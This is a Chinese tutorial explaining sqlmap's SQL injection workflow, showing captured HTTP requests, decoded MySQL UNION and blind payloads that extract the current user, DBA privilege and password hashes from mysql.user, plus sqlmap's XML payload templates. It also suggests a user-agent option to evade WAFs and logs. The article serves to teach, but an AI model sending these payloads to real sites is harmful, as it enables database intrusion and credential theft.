精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

聊一聊SQLMAP在進(jìn)行SQL注入時(shí)的整個(gè)流程

安全 網(wǎng)站安全
本文就用我們看的見的角度來(lái)分析,看看sqlmap到底發(fā)送了什么payload,這些payload是怎么出來(lái)的,不深入代碼層面。

很多小伙伴在發(fā)現(xiàn)或者判斷出注入的時(shí)候,大多數(shù)選擇就是直接上sqlmap,結(jié)果往往也不盡人意,于是就有想法來(lái)寫寫 sqlmap 從執(zhí)行到判斷注入,到底發(fā)生了什么?

本文就用我們看的見的角度來(lái)分析,看看sqlmap到底發(fā)送了什么payload,這些payload是怎么出來(lái)的,不深入代碼層面。

測(cè)試環(huán)境:

  1. sqlmap(1.3.6.58#dev)  
  2. Burp Suite  
  3. http://attack.com?1.php?id=1 

測(cè)試方式

利用 sqlmap 的 proxy 參數(shù),我們將代理設(shè)置為 8080 端口用 burpsuite 進(jìn)行抓包。

  1. sqlmap.py -u "http://attack.com?1.php?id=1" --proxy="http://127.0.0.1:8080" 

(測(cè)試了很久好像本地搭建的環(huán)境無(wú)法抓包,所以就找了有注入點(diǎn)的網(wǎng)站,漏洞已上報(bào)給漏洞平臺(tái))

抓取到的包如下 :

sqlmap 的準(zhǔn)備工作

我們也觀察到,sqlmap 默認(rèn)發(fā)送的 User-Agent 是這樣的。

  1. User-Agent: sqlmap/1.3.6.58#dev (http://sqlmap.org) 

所以為了避免被 waf 或者日志里面記錄,我們一般可以添加一個(gè) --random-agent 參數(shù)在后面。

首先我們的 sqlmap 會(huì)連續(xù)發(fā)送出很多數(shù)據(jù)包來(lái)檢測(cè)目標(biāo)網(wǎng)站是否穩(wěn)定:

  1. GET /xxxx.php?id=1 HTTP/1.1 
  2. Host: www.xxxx.xxx 
  3. Accept: */* 
  4. User-Agent: sqlmap/1.3.6.58#dev (http://sqlmap.org) 
  5. Connection: close 
  6. Cache-Control: no-cache 
  7.  
  8. [INFO] testing connection to the target URL 
  9. [INFO] testing if the target URL content is stable 
  10. [INFO] target URL content is stable 

接下來(lái)會(huì)檢測(cè)是否為 dynamic,和上面的請(qǐng)求包相比,sqlmap 修改了 id 后面的值。

  1. GET /xxxx.php?id=2324 HTTP/1.1 
  2. Host: www.xxx.xxx 
  3. Accept: */* 
  4. User-Agent: sqlmap/1.3.6.58#dev (http://sqlmap.org) 
  5. Connection: close 
  6. Cache-Control: no-cache 
  7.  
  8. [INFO] testing if GET parameter 'id' is dynamic 

看不懂這是什么騷操作,我們來(lái)看看源碼里面怎么說(shuō) (sqlmap\lib\controller\checks.py)。

  1. def checkDynParam(place, parameter, value): 
  2.     """ 
  3.     This function checks if the URL parameter is dynamic. If it is 
  4.     dynamic, the content of the page differs, otherwise the 
  5.     dynamicity might depend on another parameter. 
  6.     """ 

根據(jù)輸出語(yǔ)句的關(guān)鍵詞查找,我追蹤到了這個(gè) checkDynParam 函數(shù),大概的作用就是修改我們現(xiàn)在獲取到的參數(shù)值,看修改前后的頁(yè)面返回是否相同(有的時(shí)候注入有多個(gè)參數(shù),那么有些無(wú)關(guān)緊要的參數(shù)修改后頁(yè)面是沒有變化的),若有變化(或者說(shuō)這個(gè)參數(shù)是真實(shí)有效的),sqlmap 才會(huì)走到下一步。

下一步的數(shù)據(jù)包和功能如下:

  1. GET /xxxx.php?id=1%27.%29%2C%2C.%28.%29%22 HTTP/1.1 
  2. Host: www.xxx.xxx 
  3. Accept: */* 
  4. User-Agent: sqlmap/1.3.6.58#dev (http://sqlmap.org) 
  5. Connection: close 
  6. Cache-Control: no-cache 
  7.  
  8. [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') 

我們將上面的 url 編碼解碼:

  1. /xxxx.php?id=1%27.%29%2C%2C.%28.%29%22 
  2. /xxxx.php?id=1'.),,.(.)" 

這幾個(gè)字符串就能判斷是 MySQL 數(shù)據(jù)庫(kù)?又是什么騷操作,再看看源碼吧 (sqlmap\lib\controller\ckecks.py):

  1. infoMsg += " (possible DBMS: '%s')" % Format.getErrorParsedDBMSes() 

找到了一條語(yǔ)句,跟蹤這個(gè) getErrorParsedDBMSes() 函數(shù)。

  1. def getErrorParsedDBMSes(): 
  2.         """ 
  3.         Parses the knowledge base htmlFp list and return its values 
  4.         formatted as a human readable string. 
  5.  
  6.         @return: list of possible back-end DBMS based upon error messages 
  7.         parsing. 
  8.         @rtype: C{str} 
  9.         """ 

那么這個(gè)函數(shù)就是通過(guò)報(bào)錯(cuò)信息(就是上面的 payload) 來(lái)辨別數(shù)據(jù)庫(kù)的類型,剛好我找的這個(gè)網(wǎng)站也是爆出了 MySQL 語(yǔ)句的錯(cuò)誤,然后就通過(guò)正則 (sqlmap/data/xml/errors.xml) 識(shí)別出來(lái)啦,篇幅原因源碼就不分析了。

sqlmap 的注入分析

  1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads sp 
  2. ecific for other DBMSes? [Y/n] Y 
  3. for the remaining tests, do you want to include all tests for 'MySQL' extending 
  4. provided level (1) and risk (1) values? [Y/n] Y 

上面 sqlmap 已經(jīng)得到了數(shù)據(jù)庫(kù)的類型并且參數(shù)也是有效的,接下來(lái)往下走 sqlmap 就開始判斷注入了(這里直接用-v3 參數(shù)顯示 payload 更加的清晰)。

這一塊也是大家最需要搞清楚的一部分,很多小伙伴看著感覺有注入,哎,上 sqlmap,然后基本上一片紅,但是實(shí)際上,按照 sqlmap 對(duì)注入的分類,我們可以更加清晰的了解 sqlmap 到底做了什么,這些東西是從哪里出來(lái)。

首先要說(shuō)一下,sqlmap 有一個(gè) —technique 參數(shù),在運(yùn)行的整個(gè)過(guò)程中,也是按照這幾類來(lái)檢測(cè)的:

  1. --technique=TECH..  SQL injection techniques to use (default "BEUSTQ") 
  2. B: Boolean-based blind SQL injection(布爾型注入) 
  3. E: Error-based SQL injection(報(bào)錯(cuò)型注入) 
  4. U: UNION query SQL injection(可聯(lián)合查詢注入) 
  5. S: Stacked queries SQL injection(可多語(yǔ)句查詢注入) 
  6. T: Time-based blind SQL injection(基于時(shí)間延遲注入) 
  7. Q: inline_query SQL injection(內(nèi)聯(lián)注入) 

對(duì)這幾種注入還不熟練于心的小伙伴們要好好補(bǔ)一下基礎(chǔ)。

那么這些主要的注入語(yǔ)句,我們可以在 sqlmap/data/xml/queries.xml 中查看了解,總結(jié)的還是挺全面的,這里截取一部分出來(lái)。

  1. <dbms value="MySQL"> 
  2.         <cast query="CAST(%s AS CHAR)"/> 
  3.         <length query="CHAR_LENGTH(%s)"/> 
  4.         <isnull query="IFNULL(%s,' ')"/> 
  5.         <delimiter query=","/> 
  6.         <limit query="LIMIT %d,%d"/> 
  7.         <limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/> 
  8.         <limitgroupstart query="1"/> 
  9.         <limitgroupstop query="2"/> 
  10.         <limitstring query=" LIMIT "/> 
  11.         <order query="ORDER BY %s ASC"/> 
  12.         <count query="COUNT(%s)"/> 
  13.         <comment query="-- -" query2="/*" query3="#"/> 
  14.         <substring query="MID((%s),%d,%d)"/> 
  15.         <concatenate query="CONCAT(%s,%s)"/> 
  16.         <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/> 
  17.         <hex query="HEX(%s)"/> 
  18.         <inference query="ORD(MID((%s),%d,1))>%d"/> 
  19.         <banner query="VERSION()"/> 
  20.         <current_user query="CURRENT_USER()"/> 
  21.         <current_db query="DATABASE()"/> 
  22.         <hostname query="@@HOSTNAME"/> 
  23. ...... 
  24. ...... 
  25. ...... 

對(duì)于每種類型的注入語(yǔ)句需要如何組合,在 sqlmap/data/xml/payloads 下有六個(gè)文件,里面主要是定義了測(cè)試的名稱(也就是我們控制臺(tái)中輸出的內(nèi)容)、風(fēng)險(xiǎn)等級(jí)、一些 payload 的位置等,了解一下就行了。

  1. <test> 
  2.         <title>Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title> 
  3.         <stype>6</stype> 
  4.         <level>1</level> 
  5.         <risk>1</risk> 
  6.         <clause>1,2,3,4,5</clause> 
  7.         <where>1</where> 
  8.         <vector>[UNION]</vector> 
  9.         <request> 
  10.             <payload/> 
  11.             <comment>[GENERIC_SQL_COMMENT]</comment> 
  12.             <char>[CHAR]</char> 
  13.             <columns>[COLSTART]-[COLSTOP]</columns> 
  14.         </request> 
  15.         <response> 
  16.             <union/> 
  17.         </response> 
  18.     </test> 

同目錄下還有一個(gè) boundaries.xml 文件,里面主要是定義了一些閉合的符號(hào),比方說(shuō)我們注入點(diǎn)需要閉合,添加單引號(hào)、雙引號(hào)、括號(hào)等一系列的組合方式,就是從這個(gè)文件當(dāng)中提取出來(lái)的。

  1. <boundary> 
  2.        <level>3</level> 
  3.        <clause>1</clause> 
  4.        <where>1,2</where> 
  5.        <ptype>3</ptype> 
  6.        <prefix>'))</prefix> 
  7.        <suffix> AND (('[RANDSTR]' LIKE '[RANDSTR]</suffix> 
  8.    </boundary> 

所以梳理一下思路,我們最終會(huì)發(fā)送給目標(biāo)服務(wù)器的 payload,首先是需要閉合的 (boundaries.xml),然后從對(duì)應(yīng)的注入類型的各種測(cè)試模板中提取相應(yīng)的參數(shù)(比如:boolean_blind.xml),然后在 queries.xml 中取出相應(yīng)的表達(dá)式,***通過(guò) tamper 的渲染,輸出我們最終的 payload,也就是我們的 -v3 參數(shù)。

sqlmap 的一些參數(shù)

我們主要分析以下兩個(gè)命令:

  1. --is-dba 
  2. --passwords 

命令主要是判斷 mysql 用戶的一些信息,當(dāng)我們發(fā)現(xiàn)注入可以利用的時(shí)候,下一步就是要看當(dāng)前用戶的權(quán)限看能有什么的操作了。

1. 判斷是否是 dba 權(quán)限

sqlmap 一共發(fā)了兩個(gè)請(qǐng)求包:

  1. GET /xxxx.php?id=-2478%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280xxxxxxx%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x7176786b71%29%2CNULL%2CNULL--%20HZdP HTTP/1.1 
  2. Host: www.xxxx.xxx 
  3. Accept: */* 
  4. User-Agent: sqlmap/1.3.6.58#dev (http://sqlmap.org) 
  5. Connection: close 
  6. Cache-Control: no-cache 
  7.  
  8.  
  9. GET /xxxx.php?id=-6628%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CCONCAT%280x7178787871%2C%28CASE%20WHEN%20%28%28SELECT%20super_priv%20FROM%20mysql.user%20WHERE%20user%3D0xxxxxxxx%20LIMIT%200%2C1%29%3D0x59%29%20THEN%201%20ELSE%200%20END%29%2C0x7170627071%29--%20mOPV HTTP/1.1 
  10. Host: www.xxxx.xxx 
  11. Accept: */* 
  12. User-Agent: sqlmap/1.3.6.58#dev (http://sqlmap.org) 
  13. Connection: close 
  14. Cache-Control: no-cache 

將 payload 解碼:

  1. /xxxx.php?id=-2478 UNION ALL SELECT NULL,CONCAT(0x71766a6271,IFNULL(CAST(CURRENT_USER() AS CHAR),0x20),0xxxxx),NULL,NULL-- HZdP 
  2.  
  3. /xxxx.php?id=-6628 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7178787871,(CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=0xxxxx LIMIT 0,1)=0x59) THEN 1 ELSE 0 END),0x7170627071)-- mOPV 

我們直接在 mysql 控制臺(tái)下執(zhí)行命令:

***個(gè)命令返回了用戶名, 0x71766a6271 解碼為 qvjbq,那么這一步我們可以提取出用戶名了。

第二個(gè)命令返回了 1 ,我們將查詢命令提取出來(lái):

  1. SELECT super_priv FROM mysql.user WHERE user=0xxxxx LIMIT 0,1 

在 mysql 數(shù)據(jù)庫(kù)下的 user 表中查詢 super_priv (超級(jí)權(quán)限)的值:

返回了 Y,所以我們判斷是否為 dba 的思路就是通過(guò)查看 mysql.user 下 super_priv 的值。

這個(gè)命令有一個(gè)坑,有的時(shí)候我們所注入的服務(wù)器上面并沒有 mysql 這個(gè)數(shù)據(jù)庫(kù),所以用這個(gè)命令的前提是 mysql 這個(gè)數(shù)據(jù)庫(kù)要存在。

2. 查詢密碼

抓的包:

  1. GET /xxx.php?id=1%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28COUNT%28DISTINCT%28authentication_string%29%29%20AS%20CHAR%29%2C0x20%29%20FROM%20mysql.user%20WHERE%20user%3D0x64623833323331%29%2C1%2C1%29%29%3E48 HTTP/1.1 
  2. Host: www.xxxx.xxx 
  3. Accept: */* 
  4. User-Agent: sqlmap/1.3.6.58#dev (http://sqlmap.org) 
  5. Connection: close 
  6. Cache-Control: no-cache 

解碼:

  1. /xxxx.php?id=1 AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(authentication_string)) AS CHAR),0x20) FROM mysql.user WHERE user=0xxxxx),1,1))>48 

這里有個(gè)很有趣的地方,我的 sqlmap 是 1.3.6 的版本,不知道之前的是不是,他是從 mysql.user 中獲取 authentication_string 的值,但是很有趣的是,這個(gè)值只有在 mysql 版本 5.7 以上,password 才會(huì)變成 authentication_string,我們也可以從 queries.xml 中找到這條語(yǔ)句:

  1. <passwords> 
  2.             <inband query="SELECT user,authentication_string FROM mysql.user" condition="user"/> 
  3.             <blind query="SELECT DISTINCT(authentication_string) FROM mysql.user WHERE user='%s' LIMIT %d,1" count="SELECT COUNT(DISTINCT(authentication_string)) FROM mysql.user WHERE user='%s'"/> 
  4. </passwords> 

發(fā)現(xiàn)默認(rèn)就是這個(gè) authentication_string,所以我們這里直接修改 queries.xml 中的語(yǔ)句,將查詢的列明改成 password 再測(cè)試一下。

后面測(cè)試發(fā)現(xiàn),我們?cè)跊]有修改的情況下,sqlmap 也會(huì)跑出密碼,而且查看 payload 之后,sqlmap 先是查了 authentication_string,然后查了 password:

看下源碼,然后找到了( sqlmap/plugins/generic/users.py):

  1. values = inject.getValue(query.replace("authentication_string", "password"), blind=Falsetime=False

這里用 replace 將兩個(gè)列明進(jìn)行了替換,里面有個(gè) ifel 的語(yǔ)句,要是***次沒找到就會(huì)進(jìn)行替換,這樣我們的問(wèn)題就解決掉啦,sqlmap 還是想的挺周全的哈哈。

總結(jié)

sqlmap 里面的內(nèi)容實(shí)在是太多太多,想要摸索里面的內(nèi)容需要花費(fèi)大量的時(shí)間,當(dāng)然收獲也是成正比的,搞清楚sqlmap 的流程原理,對(duì)我們 sql 注入技術(shù)會(huì)有很大的提升。

責(zé)任編輯:趙寧寧 來(lái)源: 信安之路
相關(guān)推薦

2021-08-09 06:57:41

CodeReview流程

2021-08-26 09:31:40

Nacos配置注冊(cè)

2022-10-09 08:35:06

SQL自定義排序

2023-07-06 13:56:14

微軟Skype

2020-09-08 06:54:29

Java Gradle語(yǔ)言

2021-01-28 22:31:33

分組密碼算法

2020-05-22 08:16:07

PONGPONXG-PON

2023-09-22 17:36:37

2016-01-15 09:51:27

AngularJS實(shí)際應(yīng)用

2018-06-07 13:17:12

契約測(cè)試單元測(cè)試API測(cè)試

2023-09-27 16:39:38

2021-08-01 09:55:57

Netty時(shí)間輪中間件

2024-10-28 21:02:36

消息框應(yīng)用程序

2021-12-06 09:43:01

鏈表節(jié)點(diǎn)函數(shù)

2021-07-16 11:48:26

模型 .NET微軟

2023-09-20 23:01:03

Twitter算法

2021-03-01 18:37:15

MySQL存儲(chǔ)數(shù)據(jù)

2021-02-06 08:34:49

函數(shù)memoize文檔

2021-01-29 08:32:21

數(shù)據(jù)結(jié)構(gòu)數(shù)組

2022-11-01 08:46:20

責(zé)任鏈模式對(duì)象
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

原创国产精品91| 欧美亚洲综合网| 国产专区一区二区| 午夜一区二区三区四区| 亚州av乱码久久精品蜜桃| 欧美成人video| 黄色av免费在线播放| 黄色的网站在线观看| 99久久国产免费看| 国产中文欧美精品| 日韩美女视频网站| 日韩在线视屏| 亚洲精品美女在线观看| 亚洲一区精品视频在线观看| 91九色在线看| 中文字幕一区二区三区色视频| 国内精品二区| 国产精品主播一区二区| 免费视频一区二区三区在线观看| 日韩中文字幕在线观看| 狠狠人妻久久久久久综合蜜桃| 狂野欧美性猛交xxxx| 黄网动漫久久久| 欧美三级午夜理伦三级老人| 欧美精品a∨在线观看不卡| 国产一区91精品张津瑜| 国产精品99久久久久久白浆小说| 久久精品久久精品久久| 久久日文中文字幕乱码| 国产丝袜精品第一页| 无码人妻丰满熟妇啪啪网站| 久久精品国产福利| 欧美综合在线视频| jizzjizzxxxx| www.youjizz.com在线| 亚洲欧美日韩国产综合在线| 小说区图片区图片区另类灬| 三级毛片在线免费看| 成人免费看的视频| 91久久国产综合久久蜜月精品| 毛片在线免费播放| 久久久久久网| 日本久久91av| 欧美亚洲另类小说| 久热精品视频| 欧美在线性爱视频| 狠狠人妻久久久久久综合| 一区二区91| 国内精品小视频| 久久久夜色精品| 午夜久久99| 久久99久久99精品免观看粉嫩| 日本二区三区视频| 午夜影院欧美| 欧美成人午夜免费视在线看片| 欧美三级黄色大片| 91中文字幕精品永久在线| 中文字幕日韩欧美在线视频| 国产伦精品一区二区三区视频女| 青青草综合网| 日韩中文字幕网| 翔田千里88av中文字幕| 欧美成人久久| 欧美劲爆第一页| 日韩高清精品免费观看| 宅男噜噜噜66国产日韩在线观看| 8x海外华人永久免费日韩内陆视频| 国产成人亚洲精品自产在线| 免费在线成人| 国产精品美女无圣光视频| 瑟瑟视频在线免费观看| 久久精品国产免费| 91免费在线观看网站| 狠狠躁夜夜躁av无码中文幕| 豆国产96在线|亚洲| 久久99精品久久久久久三级 | 天天色天天射天天综合网| 亚洲欧美二区三区| 2019日韩中文字幕mv| 色综合桃花网| 欧美日本在线观看| 中文字幕人妻熟女在线| 亚洲免费毛片| 日韩亚洲综合在线| 精品久久免费视频| 日本大胆欧美人术艺术动态| 成人伊人精品色xxxx视频| 精品美女www爽爽爽视频| av在线播放不卡| 亚洲第一导航| missav|免费高清av在线看| 色综合久久久久| 亚洲综合123| 亲子伦视频一区二区三区| 中文字幕av一区二区三区谷原希美| 青青操在线视频观看| 99精品国产一区二区青青牛奶 | 日韩一级性生活片| 91精品店在线| 337p日本欧洲亚洲大胆精品| 影音先锋制服丝袜| 雨宫琴音一区二区在线| 国产精品久久中文| 视频二区在线观看| 中文字幕在线一区免费| 黄色一级视频片| 国产麻豆精品| 国产亚洲欧美日韩精品| 91精品国产99久久久久久红楼 | 日本在线高清视频一区| 超碰porn在线| 在线观看成人小视频| zjzjzjzjzj亚洲女人| 日韩精品免费一区二区三区| 91国产精品91| 超碰在线人人干| 国产欧美日韩在线| heyzo亚洲| 亚洲国产一区二区三区网站| 日韩中文字幕视频| 无码一区二区三区| 99国产欧美久久久精品| 久久久天堂国产精品| 91成人在线| 亚洲男人av在线| 日本污视频在线观看| 激情综合五月婷婷| 在线成人av电影| 第四色男人最爱上成人网| 亚洲第一天堂av| 日韩一级片大全| 理论电影国产精品| 日韩电影免费观看在| 精品极品在线| 亚洲国产精品va在线观看黑人| 免费在线观看h片| 麻豆精品精品国产自在97香蕉 | 一级网站在线观看| 天天综合网91| 国产欧美日韩免费| 91精彩视频在线观看| 91久久精品一区二区二区| 添女人荫蒂视频| 99精品久久久| 久久综合给合久久狠狠色| 99riav视频在线观看| 欧美sm极限捆绑bd| 国产第一页第二页| heyzo一本久久综合| 欧美久久在线观看| 巨人精品**| 69视频在线免费观看| 天堂在线观看视频| 岛国av一区二区三区| 欧美做受喷浆在线观看| 久久av最新网址| 日韩av不卡播放| yw.尤物在线精品视频| 中文字幕亚洲专区| 亚洲一区二区人妻| 亚洲日本在线视频观看| 久久综合桃花网| 国产精品videosex极品| 国产自产在线视频一区| 伊人久久综合一区二区| 国产一区av在线| 国产一区二区三区三州| 亚洲精品日日夜夜| 极品白嫩的小少妇| 性伦欧美刺激片在线观看| 四虎永久国产精品| 国产精品麻豆| 亚洲91精品在线| 久草视频视频在线播放| 欧美日韩国产免费一区二区| 中文字幕在线有码| 99国产一区二区三精品乱码| 免费看a级黄色片| 五月婷婷六月综合| 国产欧美日韩综合一区在线观看 | 在线亚洲人成电影网站色www| 国产精品国产三级国产专业不| 精品一区二区三区蜜桃| 日本中文字幕亚洲| 欧美精选一区二区三区| 亚洲自拍高清视频网站| 色一区二区三区| 久久影视电视剧免费网站清宫辞电视| 国精产品乱码一区一区三区四区| 日本高清成人免费播放| 欧美成人黄色网| 久久精品亚洲麻豆av一区二区 | 亚洲欧洲高清在线| 国产有码在线观看| 五月婷婷久久丁香| 亚洲aaa视频| www.亚洲免费av| 亚洲黄色av网址| 亚洲国产专区校园欧美| 亚洲国产欧美不卡在线观看| 91成人短视频| 国产美女精彩久久| 交100部在线观看| 久久黄色av网站| 黄上黄在线观看| 精品国精品国产| 亚洲天堂网视频| 狠狠色狠狠色综合日日五| 91麻豆免费视频网站| 久久精品亚洲一区二区三区浴池| 国产精品无码自拍| 蜜臀av在线播放一区二区三区| 黄页网站在线观看视频| 91国语精品自产拍| 日韩电影天堂视频一区二区| 北条麻妃一区二区三区在线观看 | 国产一区二区在线视频聊天| 精品日本高清在线播放| 欧美日韩偷拍视频| 中文字幕一区二区不卡| 国产手机在线观看| 99精品黄色片免费大全| 9191在线视频| 精品一区二区免费在线观看| 男人透女人免费视频| 亚洲日本欧美| 日韩激情视频一区二区| 亚洲成人99| 一本一本a久久| 欧美精品一二| 日韩中文字幕一区| 久久99青青| 日韩精品不卡| 国产成人av| 欧美亚州在线观看| 亚洲国产合集| 久久影院理伦片| 亚洲综合图色| 久久另类ts人妖一区二区| 美女视频亚洲色图| 精品视频在线观看| 欧美绝顶高潮抽搐喷水合集| 好吊妞www.84com只有这里才有精品 | 国产一区精品| 夜夜嗨av色综合久久久综合网| 男人的天堂在线视频| 亚洲男人天堂2024| 九九热视频在线观看| 亚洲天天在线日亚洲洲精| 黄色av网站在线免费观看| 亚洲人在线观看| 国产在线色视频| 色哟哟网站入口亚洲精品| 阿v免费在线观看| 色妞欧美日韩在线| 岛国成人毛片| 色在人av网站天堂精品| 国产亚av手机在线观看| 2021国产精品视频| 视频在线日韩| 国产精品综合网站| 国产一区二区三区| 国产精品日韩一区二区免费视频| 国偷自产视频一区二区久| 久久久久se| av永久不卡| 免费看污污视频| 国一区二区在线观看| 奇米精品一区二区三区| 久久久人人人| 亚洲综合20p| 不卡av在线网| 扒开jk护士狂揉免费| 国产精品区一区二区三区| 成人一级黄色大片| 午夜欧美一区二区三区在线播放| 亚洲GV成人无码久久精品| 欧美日韩国产综合久久| 性一交一乱一透一a级| 日韩av影视综合网| 137大胆人体在线观看| 欧美大片在线看免费观看| 中国字幕a在线看韩国电影| 国产精品视频一区二区高潮| 欧美一级大片在线视频| 欧美日韩一区二区三区在线观看免| 日韩电影在线视频| 91丨porny丨探花| 美女视频第一区二区三区免费观看网站| 欧美日韩久久婷婷| 久久久噜噜噜久久中文字幕色伊伊 | 久久国产精品免费视频| 麻豆蜜桃在线观看| 91久久精品国产| 羞羞色国产精品网站| 不卡中文字幕在线| 首页国产欧美日韩丝袜| 性生交大片免费看l| 国产欧美一区二区三区网站 | 亚洲a级在线播放观看| 自拍视频一区| 人妻av无码专区| 免费观看一级特黄欧美大片| 88av在线播放| 亚洲欧洲韩国日本视频| 日本一区二区免费电影| 欧美va在线播放| 在线国产91| 欧美重口另类videos人妖| 天堂va在线高清一区| 视频在线99re| 午夜在线精品偷拍| 国产国语老龄妇女a片| 中文字幕一区二区三区在线播放 | 黑人と日本人の交わりビデオ| 亚洲成精国产精品女| 国产精品久久久久久久久久久久久久久久 | 亚洲综合视频在线观看| 一二三四区在线| 国产亚洲xxx| 在线天堂新版最新版在线8| 国产精品露出视频| 欧美国产高潮xxxx1819| xx欧美撒尿嘘撒尿xx| 国产亚洲人成网站| 国产精品午夜影院| 亚洲国产精品电影在线观看| av片在线观看免费| 成人伊人精品色xxxx视频| 日韩aaaa| 蜜桃免费在线视频| 国产日韩在线不卡| 看黄色一级大片| 亚洲日韩欧美视频| 原纱央莉成人av片| 欧美激情视频一区二区三区| 国产精品久久久免费| 国产人妻人伦精品1国产丝袜| 亚洲一区二区精品久久av| www.蜜臀av.com| 欧美日本亚洲视频| 日韩高清在线观看一区二区| 男人草女人视频| 国产成人精品一区二区三区四区| 538任你躁在线精品视频网站| 欧美酷刑日本凌虐凌虐| 国产在线激情视频| 亚洲自拍偷拍色图| 黄色国产精品| 国产免费一区二区三区最新6| 亚洲午夜免费视频| 日韩一区二区三区不卡| 5252色成人免费视频| 欧美女王vk| 色噜噜狠狠永久免费| 亚洲色图都市小说| 精品人妻久久久久一区二区三区| 久久99热精品这里久久精品| 成人h动漫精品一区二区器材| 国产中文字幕乱人伦在线观看| 国产aⅴ综合色| 国产 日韩 欧美 在线| 亚洲亚裔videos黑人hd| 久久久加勒比| 久久久久久久香蕉| 91麻豆.com| 亚洲天堂久久久久| 欧美国产日韩中文字幕在线| 欧美日韩麻豆| 爱情岛论坛亚洲首页入口章节| 国产精品高潮呻吟| 亚洲精品无遮挡| 欧美在线国产精品| 日韩片欧美片| 97人妻精品一区二区三区免费| 欧美特级www| 久久99精品久久久久久野外| av免费精品一区二区三区| 欧美亚洲网站| 精品国产视频一区二区三区| 亚洲黄一区二区| 国产一区二区主播在线| 激情视频小说图片| 26uuu亚洲综合色| 亚洲性生活大片| 国模精品系列视频| 日本不卡二三区| 黄色在线免费播放| 欧美日韩二区三区| 国模雨婷捆绑高清在线| 亚洲欧洲一区二区在线观看| 成人动漫中文字幕| 在线免费观看高清视频| 91精品国产91久久久| 99久久99久久精品国产片桃花| 日本道中文字幕| 欧美精品欧美精品系列| 国产调教在线| 9191国产视频| 国产精品私人自拍|